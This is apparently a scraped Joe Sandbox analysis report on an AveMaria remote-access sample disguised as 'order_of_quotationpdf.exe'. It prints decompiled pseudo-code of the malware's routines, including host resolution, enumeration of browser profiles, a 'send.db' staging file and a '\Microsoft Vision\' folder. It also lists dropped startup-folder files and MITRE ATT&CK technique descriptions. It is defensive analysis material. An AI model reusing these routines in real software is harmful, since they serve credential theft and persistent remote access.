				intOrPtr _v36;
				char _v44;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				void _v76;
				signed int _t45;
				intOrPtr _t52;
				signed int _t64;
				void* _t71;

				_t71 = __eflags;
				_v20 = _a12;
				_v32 = E00424F7F(_v20);
				_v8 = _v8 & 0x00000000;
				_v24 = E0040B4C6(_a8,  &_v44);
				E00406E4B(_v24, _t71,  &_v12);
				E00401698( &_v44);
				_t45 = E00406B4A( &_v12);
				__imp__#11(_t45);
				_v8 = _t45;
				if(_v8 == 0xffffffff) {
					_v16 = _v16 & 0x00000000;
					_t64 = 8;
					memset( &_v76, 0, _t64 << 2);
					_v72 = _v72 & 0x00000000;
					_v68 = 1;
					_v64 = 6;
					_t52 = E00406B4A( &_v12);
					__imp__getaddrinfo(_t52, 0,  &_v76,  &_v16);
					_v36 = _t52;
					_v28 =  *((intOrPtr*)(_v16 + 0x18));
					_v8 =  *((intOrPtr*)(_v28 + 4));
				}
				E004255EC(0x5606fc, 0x560610, _a4, _v32, _v8);
				return E00406B06();
			}

0x0040583a
0x00405844
0x0040584f
0x00405852
0x00405862
0x0040586c
0x00405874
0x0040587c
0x00405882
0x00405888
0x0040588f
0x00405891
0x00405897
0x0040589d
0x0040589f
0x004058a3
0x004058aa
0x004058be
0x004058c4
0x004058ca
0x004058d3
0x004058dc
0x004058dc
0x004058f2
0x00405901

APIs

Part of subcall function 00406E4B: WideCharToMultiByte.KERNEL32(00000000,00000200,0040975B,?,00000000,00000000,00000000,00000000,?,?,?,0040975B,?,?,?,?), ref: 00406E90
Part of subcall function 00406E4B: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,0040975B,?,?,?,?), ref: 00406ED5

inet_addr.WS2_32(00000000), ref: 00405882
getaddrinfo.WS2_32(00000000,00000000,?,00000000), ref: 004058C4

Strings

pREw, xrefs: 004058C4

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$getaddrinfoinet_addr
String ID: pREw
API String ID: 1391541416-1714215553
Opcode ID: c5d82cd5ddf8f558e5cf26dcd458969624c9d696b2638c63cebb2c3d52621e84
Instruction ID: e3b1e83e92d5d7595b78b9f97afcd719497c3ca21910e6ab81d8e006611b9d5d
Opcode Fuzzy Hash: c5d82cd5ddf8f558e5cf26dcd458969624c9d696b2638c63cebb2c3d52621e84
Instruction Fuzzy Hash: E621E9B5D00209EFCF00EFA4C945AEEBBB9BF08314F10456AE912B7291DB74AA55CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004198D1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004198D1(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				WCHAR* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t31;
				void* _t40;
				void* _t43;

				_v20 = __ecx;
				E00419181(_v20, __eflags, _a4, _a8, _a12, _a16, _a20);
				_v8 = 1;
				while(1) {
					_t46 = _v8 - 0x14;
					if(_v8 > 0x14) {
						break;
					}
					_v12 = E00401000(0x400);
					wsprintfW(_v12, L"Profile %d", _v8);
					_t31 = E00401000(0x400);
					_pop(_t40);
					_v16 = _t31;
					E00421EE7(_t40, _t46, _a4, _v16, L"Default", _v12);
					_t43 = _t43 + 0x1c;
					E00401014(_v12);
					E00419181(_v20, _t46, _v16, _a8, _a12, _a16, _a20);
					_v8 = _v8 + 1;
				}
				__eflags = 1;
				return 1;
			}

0x004198d7
0x004198ec
0x004198f1
0x00419901
0x00419901
0x00419905
0x00000000
0x00000000
0x00419912
0x00419920
0x0041992e
0x00419933
0x00419934
0x00419945
0x0041994a
0x00419950
0x00419968
0x004198fe
0x004198fe
0x00419971
0x00419973

APIs

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,02800000,0042212F,02800000,?,?,00424121,?,00000000), ref: 00401006
Part of subcall function 00401000: RtlAllocateHeap.NTDLL(00000000,?,?,00424121,?,00000000), ref: 0040100D

wsprintfW.USER32 ref: 00419920

Part of subcall function 00401014: GetProcessHeap.KERNEL32(00000000,?,004220FC,?,00000000,?), ref: 0040101A
Part of subcall function 00401014: HeapFree.KERNEL32(00000000), ref: 00401021

Strings

Default, xrefs: 0041993A
Profile %d, xrefs: 00419918

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreewsprintf
String ID: Default$Profile %d
API String ID: 3692951734-1218447336
Opcode ID: d3d9e6074d7a9a92a5fd94bad16be453392b1f0e786b09bbd4472e4ca61bf668
Instruction ID: 00ee8c5ffbeb85d46cabcda4a75db5950e90397574a3d3f84efeb3e25bfdccb9
Opcode Fuzzy Hash: d3d9e6074d7a9a92a5fd94bad16be453392b1f0e786b09bbd4472e4ca61bf668
Instruction Fuzzy Hash: 0C11DA72904109FFDF02AF94DC069DD7F71FF04344F10406AFA11661A1D7765AA1EB59

Uniqueness

Uniqueness Score: -1.00%

Function 00424486 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00424486(intOrPtr __ecx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v44;
				short _v564;
				void* _t43;

				_v20 = __ecx;
				E00406F52( &_v8);
				E0040132F( &_v564, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v564);
				lstrcatW( &_v564, L"\\Microsoft Vision\\");
				E00406C53( &_v8, _t43,  &_v564);
				_v12 = E004071BE( &_v44, _t43, 0x3b);
				_v16 = E00407167(_v12,  &_v8);
				E00407088(_v16, _t43, _a4);
				E00407069( &_v44, _t43);
				E00406BE2();
				return _a4;
			}

0x0042448f
0x00424495
0x004244a8
0x004244bf
0x004244d1
0x004244e1
0x004244f0
0x004244ff
0x00424508
0x00424510
0x00424518
0x00424521

APIs

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004244BF
lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004244D1

Strings

\Microsoft Vision\, xrefs: 004244C5

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcat
String ID: \Microsoft Vision\
API String ID: 1210066190-1618823865
Opcode ID: 3c2e64e91e450ea8cce16ba7117d9e0218eb455829aa6c7400ad0f554543fa1e
Instruction ID: 6421301866525b661a6679d4bd81a2a366d38e667f09fa926b9c110e96779884
Opcode Fuzzy Hash: 3c2e64e91e450ea8cce16ba7117d9e0218eb455829aa6c7400ad0f554543fa1e
Instruction Fuzzy Hash: FB113C71D40108EADB10FBA0DC96FDD7778AB14308F5000BAA605B61D1DB786B48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00423E5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423E5E(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v44;
				short _v2092;
				void* _t46;

				_t46 = __eflags;
				_v8 = __ecx;
				E0040132F( &_v2092, 0, 0x400);
				GetTempPathW(0x400,  &_v2092);
				lstrcatW( &_v2092, L"send.db");
				E00406BFC(_v8 + 4, E00406F64( &_v12,  &_v2092));
				E00406BE2();
				_v16 = E004071BE( &_v44, _t46, 0x35);
				_v20 = E00407167(_v16, _v8 + 4);
				E00407088(_v20, _v8 + 4, _a4);
				E00407069( &_v44, _v8 + 4);
				return _a4;
			}

0x00423e5e
0x00423e67
0x00423e78
0x00423e8c
0x00423e9e
0x00423eba
0x00423ec2
0x00423ed1
0x00423ee3
0x00423eec
0x00423ef4
0x00423efd

APIs

GetTempPathW.KERNEL32(00000400,?), ref: 00423E8C
lstrcatW.KERNEL32(?,send.db), ref: 00423E9E

Part of subcall function 00406F64: lstrlenW.KERNEL32( B,00003000,00000000,?,004220E3,?), ref: 00406F73
Part of subcall function 00406F64: lstrlenW.KERNEL32(0000000A,004220E3,?), ref: 00406F8D
Part of subcall function 00406F64: lstrcpyW.KERNEL32 ref: 00406FAF

Part of subcall function 00406BFC: lstrcpyW.KERNEL32 ref: 00406C46

Strings

send.db, xrefs: 00423E92

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$PathTemplstrcat
String ID: send.db
API String ID: 3176339762-443410276
Opcode ID: a70a1773698bc5c9782a6c4aff9d1a91856b66b11d8aee0862739506712af4fc
Instruction ID: 79efb6c6b428085c9045129688e5fb0cb3d7ee77ab0a0116e22031b3be1da29a
Opcode Fuzzy Hash: a70a1773698bc5c9782a6c4aff9d1a91856b66b11d8aee0862739506712af4fc
Instruction Fuzzy Hash: DE11F771D00109EBDB00EBA1DC52EEDB7B8EB04308F4040BAE506B62D1DF74AA55CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401050 Relevance: 5.0, APIs: 4, Instructions: 15
memoryCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00401050(void* _a4, intOrPtr _a8) {

				_push(_a8);
				if(_a4 == 0) {
					return HeapAlloc(GetProcessHeap(), 0, ??);
				} else {
					return HeapReAlloc(GetProcessHeap(), 0, _a4, ??);
				}
			}

0x00401050
0x0040105a
0x0040107d
0x0040105c
0x0040106e
0x0040106e

APIs

GetProcessHeap.KERNEL32(00000000,?,?,0040BFD0,?,?,?,?,0040BF23,00000001,0040BAB4,?,?,0040CD91,?,00000001), ref: 00401061
HeapReAlloc.KERNEL32(00000000,?,0040BF23,00000001,0040BAB4,?,?,0040CD91,?,00000001,?,?,0040BAB4,?,00000001), ref: 00401068
GetProcessHeap.KERNEL32(00000000,?,0040BFD0,?,?,?,?,0040BF23,00000001,0040BAB4,?,?,0040CD91,?,00000001,?), ref: 00401070
HeapAlloc.KERNEL32(00000000,?,0040BF23,00000001,0040BAB4,?,?,0040CD91,?,00000001,?,?,0040BAB4,?,00000001), ref: 00401077

Memory Dump Source

Source File: 00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_order_of_quotationpdf.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 035e135d0cd2fb9249ab34df5063eebdcf3ca0799b2747f660a9f4391c7c2938
Instruction ID: 963439565881bace0d3e22c2c4a52bcc35d1098f4cd47d3c96ef3d1001e6e8ce
Opcode Fuzzy Hash: 035e135d0cd2fb9249ab34df5063eebdcf3ca0799b2747f660a9f4391c7c2938
Instruction Fuzzy Hash: EBD0CEB1A15201EFCF219FB0DD0C84B7EAAAB48742B428C65B24DD1170D635D495EB2D

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account.
Tactics:	Defense Evasion
Data Sources:	Authentication logs, File monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report order_of_quotationpdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: AveMaria

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\order_of_quotationpdf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2enobkgw.zjo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_matvrvpa.2uf.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Cfflo\Fjugfe.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Cfflo\Fjugfe.exe:Zone.Identifier

Static File Info

General

Windows Analysis Report
order_of_quotationpdf.exe

Function 078F2838 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 078F2823 Relevance: 10.7, APIs: 7, Instructions: 167
COMMON

Function 078C7BF0 Relevance: 1.8, Strings: 1, Instructions: 506
COMMON

Function 078F19DC Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Function 078F19E8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 078F0740 Relevance: 1.6, APIs: 1, Instructions: 93
fileCOMMON

Function 078F1839 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Function 078F0748 Relevance: 1.6, APIs: 1, Instructions: 70
fileCOMMON

Function 078F1E20 Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 078F1840 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 078F16A1 Relevance: 1.6, APIs: 1, Instructions: 67
threadinjectionCOMMON

Function 078F16A8 Relevance: 1.6, APIs: 1, Instructions: 63
threadinjectionCOMMON

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre